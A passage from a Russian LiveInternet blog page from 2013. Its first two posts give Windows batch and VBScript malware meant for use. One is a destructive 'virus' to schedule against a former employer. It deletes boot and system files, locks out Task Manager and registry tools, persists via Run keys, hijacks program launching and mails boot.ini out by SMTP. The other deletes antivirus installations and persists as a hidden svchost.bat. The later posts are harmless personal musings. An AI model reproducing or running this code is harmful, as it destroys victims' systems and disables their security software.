Запись понравилась
1
Процитировали
0
Сохранили
Четверг, 14 Марта 2013 г. 20:14
+ в цитатник
для начала слегка модифицируйте это под себя, хотя бы пропишите имена-ники или что в голову взбредет:
code: @echo Название вашей канторки " типа ник "
@echo Virus: Инфа™ Virus
@echo Autor: Автор
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%t emp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Ru n" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_ Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsof t\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsof t\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsof t\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Любое слово">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Любое слово™">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","Любое слово">>%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%t emp%\temp1.vbs
echo do>>%temp%\temp1.vbs
echo fso.getfile ("A:")>>%temp%\temp1.vbs
echo loop>>%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
echo do>>%temp%\temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
echo loop>>%temp%\temp2.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject("shell.application")>>%te mp%\temp.vbs
echo application.minimizeall>>%temp%\temp.vbs
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\ru n" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%\temp.vbs
echo while i^>0 or i^<0 >> %temp%"Любое слово",0, "Любое слово",0+16 >> %temp%\temp.vbs
echo i=i-1 >> %temp%\temp.vbs
echo wend >> %temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
echo next >> %temp%\temp.vbs
echo End If >> %temp%\temp.vbs
echo Call SendPost("smtp.mail.ru", "email", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
echo Set Flds = iConf.Fields >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs
echo s.run "shutdown -r -t 0 -c ""Сообщенице™"" -f",1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
Дплее сохраните файлик с расширением bat
Потом через at или её гуй ( планировщик задач ) поставте на выполнение, скажем, через несколько дней после расчета с конторой-работодателем.
Серия сообщений "Download ": Отсюда можно и нужно скачивать софт, книги, ролики - много полезного
Часть 1 - Агрегация RSS [Agregator Rss] Часть 2 - «Как создать жизнь своей мечты!» ... Часть 18 - Как заставить оболтуса учить математику? Часть 19 - Как удалить антивирус? Часть 20 - Для тех, кто зол на соседа или собрался уволится Часть 21 - Звуковая тема windows
Процитировано 1 раз
Запись понравилась
1
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post265287103/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post265287103/">Читать далее...</a>
Среда, 13 Марта 2013 г. 17:47
+ в цитатник
Удаление вирусов - это всем понятно, зачем же антивирус удалять? Отвечу: затем, что они могут после вирусной атаки "потерять" собственный деинсталлятор, например, ну или оставляют после "корректной" деинсталляции кучу хлама.
Бывает, что каспер триальный поставили, а он не убивается, хотя вам nod с зеркалом подогнали ... вощемта куча применений.
Ещё не мешает добавить сюда очистку реестра, но об этом позже.
code: @echo off
attrib *.bat +h +s
cd %programfiles%\Kaspersky Lab\
del *.* /q /s
cd %programfiles%\DrWeb\
del *.* /q /s
cd %programfiles%\Alwil Software\
del *.* /q /s
cd %programfiles%\ESET\
del *.* /q /s
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nul
copy ""%0"" "%SystemRoot%\system32\svchost.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "%SystemRoot%\system32\svchost.bat" /f >nul
attrib *.bat +h +r +s
Этот "код" ( сммешно ) суньте в блокнот и сохраните с расширением .bat
Серия сообщений "Download ": Отсюда можно и нужно скачивать софт, книги, ролики - много полезного
Часть 1 - Агрегация RSS [Agregator Rss] Часть 2 - «Как создать жизнь своей мечты!» ... Часть 17 - Скринсейвер, имитирующий формат диска Часть 18 - Как заставить оболтуса учить математику? Часть 19 - Как удалить антивирус? Часть 20 - Для тех, кто зол на соседа или собрался уволится Часть 21 - Звуковая тема windows
Процитировано 1 раз
2
Запись понравилась
0
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post265218064/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post265218064/">Читать далее...</a>
Среда, 13 Марта 2013 г. 08:54
+ в цитатник
Понравилось: 2 пользователям
Запись понравилась
0
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post265216238/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post265216238/">Читать далее...</a>
Среда, 13 Марта 2013 г. 08:30
+ в цитатник
Это ещё не вирус, как я обещал в каментах
к "Аверс, реверс и шиза , это лишь шутка, но не будь она хранителем экрана, а просто ехешником в авторане, могла бы и напугать .
В колонках играет - озонатор
Вложение: 4029063_format.rar
Серия сообщений "Download ": Отсюда можно и нужно скачивать софт, книги, ролики - много полезного
Часть 1 - Агрегация RSS [Agregator Rss] Часть 2 - «Как создать жизнь своей мечты!» ... Часть 15 - Как разгрести хлам на 8-ми терабайтах? Часть 16 - Печатаете двумя пальцами? Мне проще - вслепую шапрю. Часть 17 - Скринсейвер, имитирующий формат диска Часть 18 - Как заставить оболтуса учить математику? Часть 19 - Как удалить антивирус? Часть 20 - Для тех, кто зол на соседа или собрался уволится Часть 21 - Звуковая тема windows
1
Запись понравилась
0
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post265182119/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post265182119/">Читать далее...</a>
Вторник, 12 Марта 2013 г. 23:42
+ в цитатник
Если я говорю с богом - это молитва, если бог со мной - шиза. Такая же, как если бы со мной заговорили ВВП или Иосиф Виссарионович. Ну да и хвостатый с ними, благо бог со мной не говорит, но шизу в себе уже чувствую. Тот же ВВП и иже, власти, законы и прочее кажутся не просто ересью, а ересью злонамеренной, направленной на уничтожение рода людского в отделно взятой стране. В НАШЕЙ (?) стране.
Есть ли хоть один правильный закон в России? Справедливый, регламентирующий отношения людей, им затронутых, совершенно беспристрастно, равно как и представитель власти, применивший Закон в соответствии с ситуацией, его буквой и тем, на что он направлен?
Глупо надеятся на такую ересь. Мало кто задумывается об этом , по крайней мере до тех пор, пока его не заденет.
Кстати да: это так, мысли вслух, для чего, собственно, в числе прочего и предназначен блог.
Понравилось: 1 пользователю
1
Запись понравилась
4
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post264986341/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post264986341/">Читать далее...</a>
Понедельник, 11 Марта 2013 г. 19:37
+ в цитатник
как точно подметил
BraveDefender :
Цитата с башорга:
«Мне определенно кажется, что наши дизайнеры тонко издеваются надо мной. Сначала был цвет фона #bebebe, теперь вообще — #caced2»
Скриншоты проверочных слов на ЛиРу:
«сосавший»
«бухающий»
Подсказка в Word на ошибочное слово «ньюйоркцев» — «кроманьонцев»:
Процитировано 4 раз
Понравилось: 1 пользователю
Запись понравилась
0
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post264424884/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post264424884/">Читать далее...</a>
Четверг, 07 Марта 2013 г. 21:49
+ в цитатник
Вы жалеете, что 8-ка не упала набок?
Пусть пролежит сколько сможет =)
Запись понравилась
0
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post264368105/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post264368105/">Читать далее...</a>
Четверг, 07 Марта 2013 г. 13:24
+ в цитатник
Печалит лишь уход отсюда людей, коих хотел, например, с Днем Рождения поздравить, а в ответ страничка-обломашка:
Запись понравилась
0
Процитировали
0
Сохранили
<a href="https://www.liveinternet.ru/users/humiliating/post263853796/"></a><br/>... <a href="https://www.liveinternet.ru/users/humiliating/post263853796/">Читать далее...</a>
Воскресенье, 03 Марта 2013 г. 23:34
+ в цитатник
...ну и сомневаться в этом не приходится, однако время расставления точек этих может быть истинно господним - по его меркам. По нашим же - вечность, полвечности или сутки...секунды.
Как жить с этим? Живу , вроде, так же, но люди говорят: "Ты поменялся!"
Другие наоборот. Никто, в том числе и я, не знает настоящего положения вещей. Что в жизни главное? Рекламный ролик "Спрайта"? Получается , что так.